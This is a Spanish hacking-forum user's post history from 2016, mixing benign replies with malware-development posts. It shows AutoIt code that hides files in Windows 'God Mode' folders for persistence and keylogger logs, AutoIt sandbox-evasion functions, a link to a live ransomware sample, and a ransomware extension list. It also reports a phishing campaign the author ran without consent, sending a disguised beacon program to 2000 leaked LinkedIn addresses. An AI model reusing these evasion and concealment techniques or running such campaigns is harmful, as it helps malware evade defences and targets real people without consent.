Creo que no se refiere al h-worm, houdini público hace poco una especie de botnet en vbs pero sin panel web. Es como un híbrido entre botnet y rat. Cuando llegué a casa lo buscó y lo público.
Saludos
Saludos
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#202
Off Topic / Reportaje: "Bienvenidos a “Hackerville”, la capital mundial del cibercrimen"
Octubre 12, 2016, 01:17:31 PM
Hola underc0deanos
Dejo este reportaje que me ha parecido interesante
Dejo este reportaje que me ha parecido interesante
#203
Softwares e ISOs / Re:StartIsBack++ v1.3.4 Final [Devuelve el Clásico Menú Inicio a tu Windows 10]
Octubre 10, 2016, 05:27:42 PM
UUff la de tiempo que me va a ahorrar esto
Gracias por traerlo
Gracias por traerlo
#204
Desarrollo y modificación de malwares / Explotacion de "God Mode" orientada a la creacion de malware
Octubre 10, 2016, 04:59:29 PM
Buenas underc0deanos
En esta entrada mostrare como es posible explotar la característica de windows god mode y aprovecharla para la creación y ocultación de malware con un simple código de cuatro lineas.
Explicación oficial de microsoft sobre esta característica de windows (No tienes permitido ver enlaces. Registrate o Entra a tu cuenta).
El código a continuación mostrado es un simple script en autoit que automatiza este proceso
Local $directorio = "C:\Users\usuario\AppData\Roaming\godmode.{241D7C96-F8BF-4F85-B01F-E2B043341A4B}"
Local $godmode = "C:\Users\usuario\AppData\Roaming\com4.{241D7C96-F8BF-4F85-B01F-E2B043341A4B}"
DirCreate ($directorio)
Dirmove ($directorio , $godmode , 1)*Nota: En caso de desconocer el nombre de usuario se puede usar @Username
Pero como puede esto ser aprovechado por un desarrollador de malware?
Seguro que hay muchas formas de aprovechar esta característica, a mi de entrada se me ocurren dos:
La primera consistiría en crear una entrada en el registro para iniciar nuestra aplicación en el arranque, copiando previamente el binario a esa localizacion.
La segunda y poniendo un ejemplo practico podría ser aprovecharnos de esta característica con un keylogger, almacenando los logs en esa localización, de este modo se podrían almacenar tranquilamente en texto plano sin riesgo de ser descubiertos.
Un saludo
#205
Dudas y pedidos generales / Re:Google no indexa paginas de mi web de wordpress
Octubre 09, 2016, 06:10:28 PM
Buenas
Genera el sitemap de tu web y mandaselo a google para que sus spiders te indexen correctamente
Te dejo como se hace: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Genera el sitemap de tu web y mandaselo a google para que sus spiders te indexen correctamente
Te dejo como se hace: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#206
Dudas y pedidos generales / Re:[SOLUCIONADO] RAT para sistema iOS
Octubre 09, 2016, 05:58:33 PM
Te dejo un par de enlaces a informes sobre codigo dañino en iOS por si te es util o te da alguna idea
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#207
Análisis y desarrollo de malwares / Re:[TOOL] Generador de iconos aleatorios
Octubre 09, 2016, 05:46:45 PM
Muy buena la tool, ademas su autor es un tio dpm 
Si se cae el link o cualquier cosa avisad que la resubo
Un saludo
Si se cae el link o cualquier cosa avisad que la resubo
Un saludo
#208
Análisis y desarrollo de malwares / Re:CrypMIC, el ransomware que imita a CryptXXX
Octubre 09, 2016, 05:38:14 PM
Dejo una muestra de este malware desempaquetado:
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Contraseña: infected
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Contraseña: infected
#209
Análisis y desarrollo de malwares / Re:ID ransomware: herramienta online
Octubre 09, 2016, 05:33:56 PM
Muy buen servicio web
Dejo una lista de las extensiones con las que actuan los ransomware mas conocidos y el nombre de notas de rescate
Código: text
Dejo una lista de las extensiones con las que actuan los ransomware mas conocidos y el nombre de notas de rescate
*.*cry
*.*crypto
*.*darkness
*.*enc*
*.*exx
*.*kb15
*.*kraken
*.*locked
*.*nochance
*.0x0
*.1999
*.73i87A
*.7z.encrypted
*.aaa
*.abc
*.AES256
*.better_call_saul
*.bleep
*.btc
*.BTC
*.btcbtcbtc
*.canihelpyou
*.cbf
*.ccc
*.cerber
*.cerber3
*.chifrator@qq_com
*.clf
*.coverton
*.crime
*.crinf
*.crjoker
*.cry
*.crypt
*.crypted
*.crypto
*.crypto*
*.cryptolocker
*.cryptotorlocker*
*.CryptoTorLocker2015!
*.CrySiS
*.ctb2
*.CTB2
*.ctbl
*.ctbl
*.CTBL
*.czvxce
*.darkness
*.da_vinci_code
*.dyatel@qq_com
*.ecc
*.enc
*.encedRSA
*.enciphered
*.EnCiPhErEd
*.Encrypted
*.encrypted*
*.encryptedAES
*.encryptedRSA
*.enigma
*.exx
*.ezz
*.flyper
*.frtrss
*.fucked
*.fun
*.FUN
*.good
*.gruzin@qq_com
*.gsw
*.gws
*.GWS
*.ha3
*.HA3
*.hb15
*.helpdecrypt@ukr*.net
*.html
*.hydracrypt*
*.iloveworld
*.JUST
*.justbtcwillhelpyou
*.kb15
*.keybtc@inbox_com
*.kimcilware
*.KKK
*.kraken
*.lechiffre
*.LeChiffre
*.locked
*.locky
*.lol!
*.LOL!
*.magic
*.micro
*.mp3
*.nalog@qq_com
*.nochance
*.obleep
*.odin
*.omg!
*.OMG!
*.oplata@qq_com
*.oshit
*.p5tkjw
*.pizda@qq_com
*.PoAr2w
*.pzdc
*.r16m*
*.R16M01D05
*.R5A
*.r5a
*.RADAMANT
*.rdm
*.RDM
*.relock@qq_com
*.remind
*.rokku
*.rrk
*.RRK
*.sanction
*.sport
*.supercrypt
*.SUPERCRYPT
*.surprise
*.toxcrypt
*.troyancoder@qq_com
*.ttt
*.vault
*.vvv
*.xort
*.xrnt
*.XRNT
*.xrtn
*.xtbl
*.XTBL
*.xxx
*.xyz
*.zzz
*@gmail_com_*
*@india.com*
*_H_e_l_p_RECOVER_INSTRUCTIONS*
*_LAST
*cpyt*
*crypt*
*decipher*
*help_restore*.*
*help_your_files*.*
*how_to_recover*.*
*install_tor*.*
*keemail.me*
*qq_com*
*restore_fi*.*
*ukr.net*
*want your files back.*
_crypt
_DECRYPT_INFO_*
_ryp
AllFilesAreLocked*.bmp
ATTENTION!!!.txt
confirmation.key
Decrypt.exe
DECRYPT_INSTRUCTION.HTML
DECRYPT_INSTRUCTION.TXT
DECRYPT_INSTRUCTIONS.HTML
DECRYPT_INSTRUCTIONS.TXT
DecryptAllFiles*.txt
DecryptAllFiles.txt
enc_files.txt
HELP_DECRYPT.HTML
HELP_DECRYPT.lnk
HELP_DECRYPT.PNG
HELP_DECRYPT.TXT
HELP_RESTORE_FILES.txt
HELP_TO_DECRYPT_YOUR_FILES.txt
HELP_TO_SAVE_FILES.txt
how to decrypt aes files.lnk
How_Decrypt.html
How_Decrypt.txt
HowDecrypt.txt
last_chance.txt
message.txt
MESSAGE.txt
oor*.
recovery_file.txt
recovery_key.txt
RECOVERY_KEY.TXT
restore_files*.txt
restore_files.txt
vault.hta
vault.key
vault.txt
*.zepto
*.venusf #210
Desarrollo y modificación de malwares / Funciones antiemulacion [Autoit]
Octubre 09, 2016, 05:19:45 PM
Buenas, dejo estas funciones codeadas en autoit, sirven para detectar si el proceso esta siendo ejecutado en un sandbox o otro tipo de entorno emulado, vease el deepscreen de Avast
Código: text
Un saludo.
#cs ----------------------------------------------------------------------------
AutoIt Version: 3.3.8.1
Author: Blau
Thanks to: SadFud
#ce ----------------------------------------------------------------------------
#include <Misc.au3>
Local $aParams[3] ;Array que contiene los parámetros del callback
$aParams[0] = "CallArgArray" ;Obligatorio para la función Call
$aParams[1] = "Caca" ;$sTitle
$aParams[2] = "Pedo" ;$sMessage
AntiEmulationByMouse("Funciona", $aParams)
AntiEmulationByFreeSpace("Funciona", $aParams)
AntiEmulationByPixel("Funciona", $aParams)
AntiEmulationByWindow("Funciona", $aParams)
AntiEmulationByKey(41, "Funciona", $aParams)
Func AntiEmulationByMouse($sFunction, $aParams)
Local $aPos = MouseGetPos() ;Obtiene la posición del ratón
Local $bPos = MouseGetPos() ;Obtiene la posición del ratón otra vez
While $aPos[0] = $bPos[0] And $aPos[1] = $bPos[1] ;Si las posiciones son iguales
Sleep(100) ;Esperamos 100 milisegundos
$bPos = MouseGetPos() ;Obtenemos de nuevo la posición del ratón
WEnd
Call($sFunction, $aParams) ;Llamamos a la función callback
EndFunc
Func AntiEmulationByWindow($sFunction, $aParams)
Local $aWindow = WinGetTitle("[ACTIVE]")
Local $bWindow = WinGetTitle("[ACTIVE]")
While $aWindow = $bWindow
Sleep(100)
$bWindow = WinGetTitle("[ACTIVE]")
WEnd
Call($sFunction, $aParams)
EndFunc
Func AntiEmulationByKey($sKey, $sFunction, $aParams) ;https://www.autoitscript.com/autoit3/docs/libfunctions/_IsPressed.htm
While Not _IsPressed($sKey)
Sleep(100)
WEnd
Call($sFunction, $aParams)
EndFunc
Func AntiEmulationByFreeSpace($sFunction, $aParams)
Local $aSpace = DriveSpaceFree(@HomeDrive & "\")
Local $bSpace = DriveSpaceFree(@HomeDrive & "\")
While $aSpace = $bSpace
Sleep(100)
$bSpace = DriveSpaceFree(@HomeDrive & "\")
WEnd
Call($sFunction, $aParams)
EndFunc
Func AntiEmulationByPixel($sFunction, $aParams)
Local $nRandomX = Random(0, @DeskTopHeight, 1)
Local $nRandomY = Random(0, @DeskTopWidth, 1)
Local $aPixel = PixelGetColor ($nRandomX, $nRandomY)
Local $bPixel = PixelGetColor ($nRandomX, $nRandomY)
While $aPixel = $bPixel
Sleep(100)
$bPixel = PixelGetColor ($nRandomX, $nRandomY)
WEnd
Call($sFunction, $aParams)
EndFunc
Func Funciona($sTitle, $sMessage)
MsgBox(0, $sTitle, $sMessage)
EndFuncUn saludo.
#211
Hacking / Re:Cuatro maneras de hackear un cajero automático
Octubre 09, 2016, 04:29:33 PM
Buen post 
A principios de este año pillaron a los responsables del desarrollo de Tyupkin
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
A principios de este año pillaron a los responsables del desarrollo de Tyupkin
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
#212
Seguridad / Trabajo de investigacion: Operación link azul
Octubre 07, 2016, 05:39:04 PM
Buenas underc0deanos;
*Esta entrada es la parte final de un proceso de investigación. En ningún momento de la misma se ha visto comprometida la información de ningún equipo.*
En esta entrada presentare un trabajo de investigación; el objetivo es comprobar la vulnerabilidad de los usuarios a una posible infección, en este caso usando como vector de ataque el hackeo a linkedin.
Para ello cree un pequeño programa en vb.net simulando ser una herramienta para comprobar si la cuenta del usuario había sido publicada a través de su dirección de e-mail.
El programa en cuestion es el siguiente:
El programa es pura fachada evidentemente y no comprueba absolutamente nada.
Primera parte de la operación link azul:
Elegí 2000 email aleatorios de la base de datos de linkedin (seleccioné 1000 de España, para formar una estadística a parte)
El vector de infección para la propagación del programa fue un e-mail con dirección falsa y un archivo adjunto.
Como veis, nada sofisticado, sin invertir casi nada en la parte de ingeniería social.
Funcionamiento del archivo cebo:
El archivo simplemente crea un pequeño script en vbs para visitar una web sin abrir el navegador.
Código: vb
*Los créditos del script van en este caso para Adwind. Allí donde estés, un saludo
Cuando el usuario "comprueba su email" el programa simplemente ejecuta el archivo y lo borra.
Resultados:
Los resultados realmente me sorprendieron, empezaremos primero por los de España:
De 1000 emails enviados la web donde se recopilaban las ips y se pintaba el mapa, registro ni mas ni menos que 435
Esto nos deja el escalofriante dato de que un 43,5% de los usuarios ejecutaron y "comprobaron" su email.
En total el numero de usuarios afectados del total de 2000 fueron 1231 un 61,55%.
En el top 5 de paises se encuentran
En total hubo usuarios afectados en 62 paises
Como se puede observar en el mapa, los países mas afectados en su mayoría han sido de habla hispana, quizás si el mensaje hubiera estado escrito en ingles la cosa habría cambiado.
Conclusiones:
Al recopilar resultados me quede realmente sorprendido, no esperaba tener un ratio de infección de mas del 10-20%, pero la realidad a triplicado mis expectativas. Ante esto creo que hay mucho que reflexionar, que hubiera pasado si en vez de un script para realizar una conexión, el archivo fueses un ransomware, o un spyware, o cualquier tipo de malware? Realmente es la gente tan vulnerable? Eso parece... Por cuanto tiempo serán las personas el eslabón mas débil de la cadena? Me temo que siempre sera así. Afortunadamente desde organismos como INCIBE (No tienes permitido ver enlaces. Registrate o Entra a tu cuenta) se lleva a cabo una ardua tarea de conciencian sobre el uso responsable de la tecnología; y bajo mi punto de vista este es el camino que mas hay que trabajar en la lucha contra el cibercrimen, la educación, es la base de todo, y en la tecnología no iba a ser menos.
Por ultimo quiero lanzar también una critica a todas las compañías de antivirus, estoy convencido que muchas habrán recibido la muestra, en la web que recopilaba las visitas se indicaba que todo era una investigación y que si algún investigador de seguridad, ya fuera de alguna empresa o independiente , llegaba ahí, que contactase. Nadie lo hizo. Ademas, la campaña fue lanzada a principios de Julio, han tenido dos meses para mover ficha, meter el dominio en lista negra... algo.. y este ha sido el resultado:
Eso es todo.
Un saludo.
*Esta entrada es la parte final de un proceso de investigación. En ningún momento de la misma se ha visto comprometida la información de ningún equipo.*
En esta entrada presentare un trabajo de investigación; el objetivo es comprobar la vulnerabilidad de los usuarios a una posible infección, en este caso usando como vector de ataque el hackeo a linkedin.
Para ello cree un pequeño programa en vb.net simulando ser una herramienta para comprobar si la cuenta del usuario había sido publicada a través de su dirección de e-mail.
El programa en cuestion es el siguiente:
El programa es pura fachada evidentemente y no comprueba absolutamente nada.
Primera parte de la operación link azul:
Elegí 2000 email aleatorios de la base de datos de linkedin (seleccioné 1000 de España, para formar una estadística a parte)
El vector de infección para la propagación del programa fue un e-mail con dirección falsa y un archivo adjunto.
Como veis, nada sofisticado, sin invertir casi nada en la parte de ingeniería social.
Funcionamiento del archivo cebo:
El archivo simplemente crea un pequeño script en vbs para visitar una web sin abrir el navegador.
Set IE = CreateObject("InternetExplorer.Application")
IE.Visible = False
IE.Navigate "URL"*Los créditos del script van en este caso para Adwind. Allí donde estés, un saludo
Cuando el usuario "comprueba su email" el programa simplemente ejecuta el archivo y lo borra.
Resultados:
Los resultados realmente me sorprendieron, empezaremos primero por los de España:
De 1000 emails enviados la web donde se recopilaban las ips y se pintaba el mapa, registro ni mas ni menos que 435
Esto nos deja el escalofriante dato de que un 43,5% de los usuarios ejecutaron y "comprobaron" su email.
En total el numero de usuarios afectados del total de 2000 fueron 1231 un 61,55%.
En el top 5 de paises se encuentran
En total hubo usuarios afectados en 62 paises
Como se puede observar en el mapa, los países mas afectados en su mayoría han sido de habla hispana, quizás si el mensaje hubiera estado escrito en ingles la cosa habría cambiado.
Conclusiones:
Al recopilar resultados me quede realmente sorprendido, no esperaba tener un ratio de infección de mas del 10-20%, pero la realidad a triplicado mis expectativas. Ante esto creo que hay mucho que reflexionar, que hubiera pasado si en vez de un script para realizar una conexión, el archivo fueses un ransomware, o un spyware, o cualquier tipo de malware? Realmente es la gente tan vulnerable? Eso parece... Por cuanto tiempo serán las personas el eslabón mas débil de la cadena? Me temo que siempre sera así. Afortunadamente desde organismos como INCIBE (No tienes permitido ver enlaces. Registrate o Entra a tu cuenta) se lleva a cabo una ardua tarea de conciencian sobre el uso responsable de la tecnología; y bajo mi punto de vista este es el camino que mas hay que trabajar en la lucha contra el cibercrimen, la educación, es la base de todo, y en la tecnología no iba a ser menos.
Por ultimo quiero lanzar también una critica a todas las compañías de antivirus, estoy convencido que muchas habrán recibido la muestra, en la web que recopilaba las visitas se indicaba que todo era una investigación y que si algún investigador de seguridad, ya fuera de alguna empresa o independiente , llegaba ahí, que contactase. Nadie lo hizo. Ademas, la campaña fue lanzada a principios de Julio, han tenido dos meses para mover ficha, meter el dominio en lista negra... algo.. y este ha sido el resultado:
Eso es todo.
Un saludo.
#213
Seguridad / Riesgos de uso de Whatsapp
Octubre 07, 2016, 05:09:59 PM
Saludos underc0deanos
Este post tratara un tema que ha cobrado relevancia en España, a raiz de los cambios en las políticas del uso de los datos de los usuarios por parte de Whatsapp tras su compra por Facebook.
"(Madrid, 5 de octubre de 2016). La Agencia Española de Protección de Datos ha iniciado de oficio actuaciones previas de investigación para examinar las comunicaciones de datos personales realizadas entre Whatsapp y Facebook, así como los tratamientos que dicha comunicación genera. Estas actuaciones tienen por objeto estudiar si los extremos mencionados respetan la legislación española de protección de datos así como determinar, en su caso, las responsabilidades correspondientes.
La investigación se centrará, entre otros aspectos, en qué información de los usuarios de Whatsapp se recoge y envía a Facebook, los fines para los que se utiliza, los plazos de conservación, o las opciones que se ofrecen a los usuarios para oponerse a los tratamientos de su información personal.
El pasado mes de agosto WhatsApp actualizó los términos de su servicio y la política de privacidad, introduciendo cambios sobre la forma en la que maneja la información personal de sus usuarios. La AEPD, como hace habitualmente cuando surgen inquietudes con respecto al impacto que determinados productos o servicios pueden tener sobre la privacidad y la protección de datos de los ciudadanos, ya anunció entonces que estaba estudiando los cambios introducidos por la compañía.
Esta actuación de la Agencia española está en línea y se coordinará con iniciativas similares de Autoridades de Protección de Datos como Alemania, Italia o Reino Unido, si bien cada una actúa ejerciendo las potestades que le confieren sus respectivos ordenamientos nacionales."
Se puede ampliar en: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Junto con esta actuación por parte de la AEPD el CERT del centro criptológico nacional (dependiente del CNI) organismo encargado de la protección sobre sistemas clasificados y sobre sistemas de las Administraciones Públicas y de empresas y organizaciones de interés estratégico, ha publicado un informe donde detalla los riesgos de uso de Whatsapp, explicando la in-eficiencia de las medidas de seguridad que ofrece esta aplicación.
A continuación dejo un enlace al informe completo del CERT donde se analiza en profundidad la seguridad de whatsapp:
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Un saludo.
